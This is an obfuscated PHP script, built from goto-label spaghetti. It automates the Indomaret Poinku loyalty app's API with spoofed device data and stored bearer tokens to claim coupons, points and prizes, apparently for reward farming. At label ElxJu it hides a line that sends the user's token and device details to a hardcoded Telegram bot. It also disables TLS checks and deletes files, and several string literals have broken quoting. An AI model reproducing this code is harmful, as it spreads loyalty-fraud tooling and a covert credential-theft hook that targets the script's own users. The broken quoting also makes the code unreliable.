  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"failed_reason":"Success PIN activation","event_label":"PIN activation","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto Ca9kW; 
  EJmp3: 
  if (!($yy9BI < $DxrJr)) { 
    goto fZnQ2; 
  } 
  goto nsRvn; 
  AvLYy: 
  $XDyMm = G8pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons/has-new-coupon", $aY0el, $GOXkU, $mlMLt); 
  goto SpiQk; 
  XfE0J: 
  die; 
  goto Mjz7D; 
  Roi_C: 
  $jcXSt = @$gIJCo["geo"]; 
  goto Sswct; 
  o7RA7: 
  $knJzU = @$lImQC["data"]["content"][2]["couponCode"]; 
  goto jiC8F; 
  e05Ru: 
  @unlink("poinhp.php"); 
  goto kaG91; 
  ibp8F: 
  echo @zM6Ic("yellow", "Status Pecahin Ayam : "); 
  goto hS2Td; 
  dqjxO: 
  $ofEkP = zFeBK("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me/protections/enable", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto sWc79; 
  d9ZGt: 
  $YXsOG = @$Ap1KM["message"]; 
  goto dmrOw; 
  eFdhA: 
  goto ckx1V; 
  goto kE9HG; 
  N0JV1: 
  if (!($fUekS == '')) { 
    goto uYD1p; 
  } 
  goto F5zB5; 
  Wbi8s: 
  echo @zM6iC("nevy", "        AAMIIN "); 
  goto S4WZq; 
  Chwcw: 
  $lPULW = $m0f8X; 
  goto cF172; 
  BX_qL: 
  $wlJRC = xOZB4(array("|"), $wZnHP)[1]; 
  goto uPIMi; 
  li7p9: 
  ectyt: 
  goto QKhZy; 
  fw4lA: 
  $qq5tL = "2" . $gYG6P . "hg5454d21vc"; 
  goto IrsDs; 
  XttWW: 
  die; 
  goto OE4L_; 
  jtZ3I: 
  $hwqq9 = tHhfs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU); 
  goto R5OGU; 
  ai408: 
  CV5_k: 
  goto eT4LJ; 
  uEDKi: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto XUHGp; 
  rMSj8: 
  echo $yy9BI . ". "; 
  goto hL1pe; 
  nL8vJ: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/skip-module/tr-skip-module", $aY0el, $GOXkU, $mlMLt); 
  goto Jx478; 
  ZAUQ0: 
  $zn5zd = $U0YgX; 
  goto W1xiW; 
  diI12: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto Yx_cW; 
  OTrdv: 
  $jTEU0; 
  goto JeqGb; 
  mwNvq: 
  echo @zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto KTj7C; 
  rvC9u: 
  echo @zm6Ic("yellow", "Masukkan Nama Kota Anda : "); 
  goto TcaPp; 
  cCvz0: 
  goto IA3io; 
  goto rfy1i; 
  GxUv5: 
  echo "
"; 
  goto UFeHI; 
  CVCdX: 
  if ($LNAso == "Diskon Rp 25.000 Klik Indomaret") { 
    goto D4vRH; 
  } 
  goto SJovd; 
  LYQTx: 
  AGZdm: 
  goto PlUQs; 
  qzh4E: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto a_dZx; 
  G_BNz: 
  @unlink("poinhp.php"); 
  goto zt4XJ; 
  xQPXT: 
  $Ap1KM = json_decode($upOL9, true); 
  goto LpVAo; 
  RzArZ: 
  echo "\xa"; 
  goto EBiBT; 
  X_5QB: 
  echo @ZM6iC("nevy", "[17] {$uU2QF} \xa  > {$e52KH} \xa
"); 
  goto HYr1o; 
  lFjF7: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto dOzgh; 
  g1guV: 
  $m_IIo = trim(fgets(STDIN)); 
  goto AKVOr; 
  epp07: 
  $Qa1_P = @$owfHy["data"]["content"][$dQ8Tp]["couponId"]; 
  goto hSvR2; 
  ElxJu: 
  KT3G1("forceclose", $zn5zd, $aY0el, $earOL, $GOXkU); 
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU"); 
  goto sjkH3; 
  Nmn6H: 
  echo "
"; 
  goto EtgZF; 
  NF9qG: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto dTZdO; 
  wbvww: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto rGzs0; 
  KZ3My: 
  $zcN5u = Xozb4(array("|"), $tqWr2)[0]; 
  goto Aed5e; 
  b5Mi3: 
  $ZqwwP = @$owfHy["data"][$qtgR3]["keyword"]; 
  goto BanQZ; 
  ZAk3u: 
  $aoIfK = trim(fgets(STDIN)); 
  goto ibrrS; 
  N_J9S: 
  $jTEU0++; 
  goto XuYvJ; 
  BkzVQ: 
  eZaFp: 
  goto wea5J; 
  vXYtL: 
  $ZNU2M = @$Ap1KM["data"]["rewards"][0]["item"][0]["name"]; 
  goto Wbb1K; 
  wUb6J: 
  echo @zm6iC("purple", "ID    : "); 
  goto QLuqS; 
  Cm2vU: 
  h8G8Y: 
  goto VSZ0R; 
  OzA2H: 
  echo @zM6iC("red", "Anda belum terdaftar, Silahkan Hubungi Owner "); 
  goto WKsfY; 
  xdGe6: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto Y2gfk; 
  ITp7p: 
  echo $yy9BI . ". "; 
  goto rNskw; 
  jfQhS: 
  echo "
"; 
  goto b8dwF; 
  RV_I1: 
  goto AUIk1; 
  goto BUEN3; 
  w09r9: 
  Q9w_S: 
  goto OfOX3; 
  pIdXS: 
  N1kWv: 
  goto dEqiK; 
  Tty61: 
  echo "\xa"; 
  goto SI53_; 
  xgO0j: 
  die; 
  goto Pf6W0; 
  sDo5R: 
  goto aKEU_; 
  goto T_N9h; 
  BVXm3: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto bAFN4; 
  O6JNu: 
  echo @zM6IC("yellow", "Harga Poin : "); 
  goto bRVfq; 
  g8swJ: 
  echo @zM6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto LzqPy; 
  s4WP6: 
  echo "
"; 
  goto G_1Lo; 
  SMCx_: 
  echo @Zm6Ic("yellow", "    Build By FERDY RAMADHAN
"); 
  goto RG7P9; 
  A3f9Q: 
  echo @ZM6Ic("green", $wd9cN); 
  goto MYWMI; 
  YSM2f: 
  echo @ZM6ic("purple", "[7] {$VW123} 
  > {$lbuGr} \xa\xa"); 
  goto mHZx1; 
  Zi6MS: 
  if (!($ldzeo == '')) { 
    goto VRnC_; 
  } 
  goto X7SAF; 
  Y7GSJ: 
  $nb9cm = round(microtime(true) * 1000); 
  goto g1ZEJ; 
  YKNWk: 
  function x3ry1($lEbop, $wDisp = null, $D18xv, $mlMLt) 
  { 
    goto n4hvk; 
    bQA2f: 
    wrEzI: 
    goto lWngr; 
    PZevp: 
    goto mVBCb; 
    goto bQA2f; 
    pxbO8: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto pUz_M; 
    VoY0s: 
    if (!$P7lm9) { 
      goto wrEzI; 
    } 
    goto ppvxR; 
    rG28H: 
    $ruc3h[] = "applicationkey: indomaret"; 
    goto tA8VD; 
    Zy6_P: 
    $AXlcQ = json_decode($y7f11, true); 
    goto d14QM; 
    N05lh: 
    $ECuqv = curl_exec($C6npe); 
    goto IYYoD; 
    ppvxR: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto iEKeO; 
    Fjhpf: 
    mVBCb: 
    goto Zy6_P; 
    IYYoD: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto VoY0s; 
    sOZFQ: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto OCl_m; 
    BrEqz: 
    return $ECuqv; 
    goto V1HmO; 
    UNK_L: 
    $ruc3h[] = "authorization: Bearer " . $D18xv . "#" . $mlMLt; 
    goto rG28H; 
    ScLUO: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto UNK_L; 
    OCl_m: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto ScLUO; 
    ga1BF: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto HDsL2; 
    oO22i: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto N05lh; 
    UUZjv: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto DTa5a; 
    HDsL2: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto QGpsl; 
    pUz_M: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto ga1BF; 
    d14QM: 
    print_r($AXlcQ); 
    goto BrEqz; 
    QGpsl: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto oO22i; 
    lWngr: 
    return false; 
    goto Fjhpf; 
    n4hvk: 
    $C6npe = curl_init(); 
    goto UUZjv; 
    iEKeO: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto PZevp; 
    DTa5a: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto sOZFQ; 
    tA8VD: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto pxbO8; 
    V1HmO: 
  } 
  goto TCxB8; 
  VE8z4: 
  tTzdV: 
  goto Ozv31; 
  EGSUd: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto i4e5N; 
  WZD8e: 
  uYD1p: 
  goto ua_0C; 
  jFIe0: 
  $zvt88 = $QRhbE; 
  goto a5NNa; 
  S6BIV: 
  $R_bYC = @$nPb0z["data"]["id"]; 
  goto SE9Y8; 
  QDJgG: 
  @unlink("poinhp.php"); 
  goto wWuTM; 
  igLYC: 
  echo "
"; 
  goto Cnge9; 
  JrA1b: 
  echo @Zm6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto Q4cjo; 
  RNAEK: 
  echo @ZM6Ic("nevy", $ZNU2M); 
  goto Pdyfx; 
  RrOSK: 
  sleep(2); 
  goto uY1yn; 
  qV_iI: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto SFpTg; 
  lTdia: 
  lqjr6("mytoken", $zn5zd, $mlMLt); 
  goto wsUqo; 
  mMLTN: 
  $POIN9 = @$owfHy["data"]["balance"]; 
  goto gNONM; 
  LCrgv: 
  $DxrJr = "100000000000000000"; 
  goto Ej7f9; 
  Ydv5v: 
  $CeRgl = @$owfHy["data"][0]["recipientName"]; 
  goto k6NcS; 
  pa3zD: 
  $lPULW = $m0f8X; 
  goto M6TPS; 
  gdThu: 
  if (!($fUekS == '')) { 
    goto EKk1g; 
  } 
  goto pbPWa; 
  BcZc1: 
  echo $jTEU0; 
  goto oR6TB; 
  P1XjP: 
  echo "
"; 
  goto GZbpD; 
  aQS5l: 
  $D18xv = @$owfHy["data"][0]["id"]; 
  goto ayiza; 
  j_17H: 
  echo "\xa"; 
  goto J4JQ1; 
  TSNoY: 
  echo @zm6iC("nevy", $wd9cN); 
  goto gmL5u; 
  UDuJL: 
  echo @zm6Ic("nevy", "Akun Ke    : "); 
  goto r_nAC; 
  rWXkI: 
  $ofEkP = cwaLZ("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/GOFRESH2022/tokens/claim/single", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto crpcv; 
  ee12d: 
  echo @zm6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto JaM1M; 
  I1BAb: 
  $LgiFv = @$Ap1KM["data"]["information"]; 
  goto grlZ3; 
  XWLYH: 
  $zvt88 = $QRhbE; 
  goto zNo_8; 
  NrQ94: 
  irVGF: 
  goto o6YWQ; 
  UvoZT: 
  if (!($cPDPt == 11)) { 
    goto xCMQT; 
  } 
  goto p6pym; 
  xM5qM: 
  $zn5zd = trim(fgets(STDIN)); 
  goto x2BCx; 
  KEzEt: 
  $S02nx = @$lImQC["data"]["content"][13]["couponName"]; 
  goto ZCjtF; 
  SFraX: 
  if (!($XDyMm == "0")) { 
    goto Fcnek; 
  } 
  goto C3iNo; 
  C0b6j: 
  echo @Zm6IC("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto f0Msa; 
  J8niW: 
  $UHj7C = G8Pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto LyT7u; 
  HLO5p: 
  $ZNU2M = @$owfHy["data"]["content"][$D2zwh]["name"]; 
  goto B7_L8; 
  lpuTf: 
  echo @Zm6Ic("yellow", "        AAMIIN "); 
  goto tzlNv; 
  YzXDq: 
  goto LA_80; 
  goto tLljN; 
  hnJzX: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto uu2gK; 
  xkf3f: 
  $XTuz1 = G1WXt("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me/coupons/exchange", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto o5Ohl; 
  b91Vm: 
  echo @ZM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto lnvS6; 
  o5jb2: 
  Gq2T9: 
  goto UhQTr; 
  mvWXh: 
  goto ZqS2R; 
  goto a0kRQ; 
  gF5Fg: 
  $YXsOG = "Username  "{$zn5zd}"  Telah Login Ke Script IDM POINKU Terbaru di IP = " . $ae0GJ . " Lokasi = " . $jcXSt . ".. !!"; 
  goto hhSOy; 
  ZUJjN: 
  echo @zM6iC("nevy", " | Script IDM POINKU\xa"); 
  goto GxlNR; 
  Akwg1: 
  awvwA: 
  goto eef1h; 
  dfcGR: 
  RHRij("Kupon Poinku new.txt", $knJzU); 
  goto LYQTx; 
  CzTPd: 
  XR1Tf: 
  goto wa8GE; 
  amjZI: 
  @unlink("poinhp.php"); 
  goto rdASk; 
  Z6h6f: 
  if (!unlink($xp_1p)) { 
    goto FlJax; 
  } 
  goto rwvRX; 
  kHzhX: 
  $KTLep = @$lImQC["data"]["content"][1]["couponCode"]; 
  goto q9z4g; 
  tT2Bl: 
  KcewV: 
  goto erEEh; 
  sMCF1: 
  goto b0ztV; 
  goto lGCjP; 
  F0Fjz: 
  $GOXkU = "Xiaomi Redmi 5 Plus"; 
  goto CSUr1; 
  bAFN4: 
  $GOXkU = $w5ulg; 
  goto SWCTk; 
  gVo9_: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto luIKU; 
  HEE7l: 
  FlJax: 
  goto C_tuY; 
  zbvnq: 
  echo @zm6iC("green", "[12] {$LNAso} 
  > {$f2A4u} \xa\xa"); 
  goto mhPin; 
  st12u: 
  goto k2R5x; 
  goto dsvmA; 
  zAjuM: 
  die; 
  goto KGBSP; 
  n3Ac7: 
  echo "\xa"; 
  goto HJBvX; 
  jyPnq: 
  piuvy: 
  goto pXPoJ; 
  MSqF0: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto x29nF; 
  zYTRQ: 
  echo "\xa"; 
  goto sGyE9; 
  X4lGn: 
  echo @ZM6Ic("yellow", "Status Cek Kupon : "); 
  goto NIIPa; 
  n1eQD: 
  goto MSwAP; 
  goto X7Wc2; 
  p6gIA: 
  echo "\xa"; 
  goto uYg9g; 
  O9ca7: 
  $Tvjlw = rand(0, 890); 
  goto JJg2J; 
  Jx478: 
  $wDisp = ''; 
  goto cs8L7; 
  Nwhy1: 
  $hdCXp = trim(fgets(STDIN)); 
  goto GgFfz; 
  tbDFN: 
  $efQM2 = count($QRhbE) - 1; 
  goto f_eFW; 
  zhjgh: 
  $ABmxY = @$owfHy["message"]; 
  goto sqioU; 
  vImzz: 
  @unlink("poinhp.php"); 
  goto ayHIl; 
  aRyiT: 
  $zvt88 = $QRhbE; 
  goto QJCXA; 
  fU8RQ: 
  echo "
"; 
  goto uNbOq; 
  SepDd: 
  $YXsOG = @$Ap1KM["message"]; 
  goto G9LDR; 
  vgbrR: 
  echo "\xa"; 
  goto Jwbfk; 
  oBg1o: 
  goto aCWFZ; 
  goto jaJV2; 
  TJT6Y: 
  echo "
"; 
  goto MxNlU; 
  yBav_: 
  $m5BZY = gGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto J7eiY; 
  wa8GE: 
  if (!($yy9BI < $DxrJr)) { 
    goto kmnPA; 
  } 
  goto qE_1z; 
  czGTj: 
  $fZ2bz = @$owfHy["message"]; 
  goto fUkb9; 
  AQeBK: 
  echo "
"; 
  goto FpdCf; 
  sEWO8: 
  echo "
"; 
  goto qPamN; 
  xSEI4: 
  $ofEkP = A0MyL("https://indomaretpoinku.com/api/gamification", $wDisp, $N0ol8, $M1ADy, $aY0el, $GOXkU, $mlMLt); 
  goto PSf1q; 
  p1xRY: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto gT8Sy; 
  MAExu: 
  echo @ZM6ic("nevy", $K4tCB); 
  goto Mtb9w; 
  LxEC0: 
  echo "\xa"; 
  goto Fb74W; 
  D9X9V: 
  if ($XDyMm == "1") { 
    goto qHUhy; 
  } 
  goto CIbrM; 
  KcLeH: 
  $zcN5u = XozB4(array("|"), $tqWr2)[0]; 
  goto u0z5i; 
  pKojU: 
  $nb9cm = round(microtime(true) * 1000); 
  goto j7f8L; 
  a2PpR: 
  echo @zm6ic("nevy", $CeRgl); 
  goto NN7jm; 
  DSAWn: 
  $hdCXp = trim(fgets(STDIN)); 
  goto VajPX; 
  cgsPT: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"click_link","event_timestamp":" . $nb9cm . ","link_label":"Konfirmasi"},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto ZVQhU; 
  o2TKk: 
  echo "\xa"; 
  goto ShkCI; 
  ap7nM: 
  $N0XGD = G8Pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto UHOUt; 
  zNo_8: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto GxIi2; 
  xzo8f: 
  echo "Deleted {$xp_1p} "; 
  goto aRKHO; 
  UKi12: 
  goto KfEmL; 
  goto O0hxR; 
  BObVG: 
  @unlink("poinhp.php"); 
  goto WDeTC; 
  Qz1nu: 
  $S8W9D = trim(fgets(STDIN)); 
  goto NaN3z; 
  J4xhG: 
  LvSq1: 
  goto c_din; 
  NssVm: 
  Tv6Tl: 
  goto IjPAg; 
  rn4By: 
  $z6UZd = trim(fgets(STDIN)); 
  goto CYzaS; 
  wlKpJ: 
  echo @zm6IC("red", "KODE MU SALAH JON!!!
"); 
  goto x9_Yt; 
  XKpv9: 
  echo @Zm6ic("yellow", "    Build By FERDY RAMADHAN
"); 
  goto ZNBgL; 
  IVGka: 
  echo @Zm6Ic("yellow", "Nama Kuponnya  : "); 
  goto uwvBF; 
  QFCAG: 
  goto C8rz0; 
  goto HEE7l; 
  Lf5WQ: 
  if (!($fUekS == '')) { 
    goto y2l5l; 
  } 
  goto FHkRx; 
  F5gUC: 
  goto AteVH; 
  goto Sx52J; 
  htdHd: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto AtJEi; 
  P7f3o: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto oj_o6; 
  PUuJw: 
  $jTEU0++; 
  goto KRKGo; 
  Uj__J: 
  curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
  goto LVZDm; 
  UHOUt: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto v1sZj; 
  HELh_: 
  echo "\xa"; 
  goto zlfMJ; 
  TxBje: 
  $eAEyy = @$lImQC["data"]["content"][3]["couponName"]; 
  goto sBKLJ; 
  DkdVG: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto O4Bvg; 
  SWGWm: 
  $OtngW = $eqo_P; 
  goto UAyjl; 
  YHEft: 
  IHjkB: 
  goto MugIV; 
  ujQH4: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto dj4Hn; 
  A0Vdd: 
  if (!($LD6vG == '')) { 
    goto xUutP; 
  } 
  goto ZO4Kj; 
  sSzdR: 
  alr8L: 
  goto Wyaqr; 
  CYzaS: 
  echo "\xa"; 
  goto Ze_qG; 
  dj4Hn: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto mA2X2; 
  BBKgz: 
  echo @ZM6IC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto Ca6xL; 
  YS1xZ: 
  $jlHkA = str_replace("-", '', $sOOnY); 
  goto wEXqb; 
  l16i0: 
  $GOXkU = $w5ulg; 
  goto qhkai; 
  uhX7M: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto JcsIo; 
  E0oru: 
  echo "
"; 
  goto xgzIC; 
  hpqJl: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto zeNT9; 
  Og2UZ: 
  vR5mg: 
  goto jn4R5; 
  END4X: 
  t27Lz: 
  goto VuGJw; 
  KAZAL: 
  echo "
"; 
  goto OseGJ; 
  lSP17: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto OzIsi; 
  gwkL_: 
  echo "
"; 
  goto eTH3i; 
  SWeRy: 
  $zvt88 = $QRhbE; 
  goto WuLs0; 
  sHvzX: 
  $UHj7C = G8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto n0VNS; 
  aMC4b: 
  die; 
  goto IRvmv; 
  NUaSL: 
  @unlink("poinhp.php"); 
  goto bQ3QD; 
  JcsIo: 
  echo "
"; 
  goto udJYZ; 
  IMOnB: 
  echo @ZM6Ic("yellow", " 9 . Generate Token Akses\xa"); 
  goto Sx3di; 
  ymmJo: 
  die; 
  goto oHvEu; 
  q111Q: 
  function zfEBk($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt) 
  { 
    goto syPo4; 
    syPo4: 
    $C6npe = curl_init(); 
    goto wqBlH; 
    nkxB1: 
    $AXlcQ = json_decode($y7f11, true); 
    goto W9LU_; 
    bWU3H: 
    goto QWxKs; 
    goto FNKAO; 
    wqBlH: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto Ofm38; 
    isWV7: 
    if (!$P7lm9) { 
      goto Xaq4l; 
    } 
    goto U7pWm; 
    GBmoN: 
    return $ECuqv; 
    goto M6wpQ; 
    pE4pr: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.5"; 
    goto R5fKC; 
    U7pWm: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto mj6E1; 
    mj6E1: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto bWU3H; 
    pgJaU: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto ltt9q; 
    bawv6: 
    return false; 
    goto GZQRB; 
    Ofm38: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto RFKmm; 
    Sn0IM: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto jLQVT; 
    jLQVT: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto pgJaU; 
    eoAdK: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto Sn0IM; 
    ltt9q: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto ZcFzX; 
    ZcFzX: 
    $ECuqv = curl_exec($C6npe); 
    goto YJ8S5; 
    PChxx: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto t2W4U; 
    t2W4U: 
    $ruc3h[] = "authorization: Bearer " . $mlMLt; 
    goto pE4pr; 
    FNKAO: 
    Xaq4l: 
    goto bawv6; 
    RFKmm: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto HOOPr; 
    GZQRB: 
    QWxKs: 
    goto nkxB1; 
    W9LU_: 
    print_r($AXlcQ); 
    goto GBmoN; 
    i5hra: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto aelBV; 
    R5fKC: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto i5hra; 
    bYMlB: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto eoAdK; 
    aelBV: 
    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto bYMlB; 
    YJ8S5: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto isWV7; 
    HOOPr: 
    curl_setopt($C6npe, CURLOPT_CUSTOMREQUEST, "PUT"); 
    goto PChxx; 
    M6wpQ: 
  } 
  goto DbkXw; 
  wsgYZ: 
  EPpoD: 
  goto C2Q8s; 
  d7TEi: 
  echo @Zm6ic("nevy", $wd9cN); 
  goto alHDl; 
  L9zdo: 
  print_r($zcN5u); 
  goto pWN9s; 
  bAz0x: 
  echo @zM6IC("purple", $fZ2bz); 
  goto OZ3eG; 
  JhAdw: 
  die; 
  goto WUeTg; 
  mEspx: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"done registration","page_urlpath":""},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto zonco; 
  ug1iK: 
  $RJnNP = trim(fgets(STDIN)); 
  goto gy03D; 
  mvBqK: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto PNM0g; 
  WC5FU: 
  echo "
"; 
  goto K2cEc; 
  Y8zV2: 
  echo @ZM6ic("red", "  Please Verify Your Device First ^^\xa"); 
  goto aLrHz; 
  Z3K8e: 
  $zn5zd = $U0YgX; 
  goto PmTxr; 
  zeS_n: 
  $XTuz1 = g1WXt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/postal-code", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto Syt7J; 
  hjVag: 
  $PQD51 = THhFs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU); 
  goto GFsfA; 
  Z0dwt: 
  if (!($ZNU2M == '')) { 
    goto Yni8F; 
  } 
  goto pnaf0; 
  mvQke: 
  IA3io: 
  goto f3KNk; 
  L84Hz: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto X5CYR; 
  tmzrq: 
  QRHsK: 
  goto VMIc9; 
  TcCw8: 
  echo @ZM6iC("nevy", $D18xv); 
  goto LxEC0; 
  cKx4E: 
  $D2zwh; 
  goto o5jb2; 
  F_rzk: 
  $zvt88 = $QRhbE; 
  goto xlspJ; 
  zF0W4: 
  $dQ8Tp = trim(fgets(STDIN)); 
  goto TqaEk; 
  CX_zf: 
  echo @zM6ic("nevy", $ABmxY); 
  goto CId6O; 
  jH633: 
  $efQM2 = count($QRhbE) - 1; 
  goto UAANB; 
  xhh2o: 
  echo @Zm6ic("nevy", $fZ2bz); 
  goto GxUv5; 
  tvm0w: 
  $m5BZY = gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto D2_Ke; 
  IkNDt: 
  @unlink("poinhp.php"); 
  goto v4kcG; 
  m6Vqe: 
  $yJiD4 = @$owfHy["data"][0]["district"]["districtName"]; 
  goto ahzgl; 
  C2Q8s: 
  if (!($yy9BI < $DxrJr)) { 
    goto V9iZ0; 
  } 
  goto tZsGQ; 
  UHHXN: 
  $Bz8Et = @$owfHy["data"][0]["postalCode"]; 
  goto Fpl08; 
  KiRsY: 
  echo "
"; 
  goto fDgG7; 
  eZoqi: 
  goto uNbUh; 
  goto ha1Vp; 
  GFo6V: 
  echo "Deleted {$xp_1p} "; 
  goto Ahdwh; 
  uJHIr: 
  $wlJRC = xOZB4(array("|"), $wZnHP)[1]; 
  goto buN63; 
  HQgEB: 
  $yy9BI; 
  goto faEcm; 
  en_ME: 
  RhriJ("Kupon Poinku new.txt", $raN1z); 
  goto BBtBz; 
  DCe2w: 
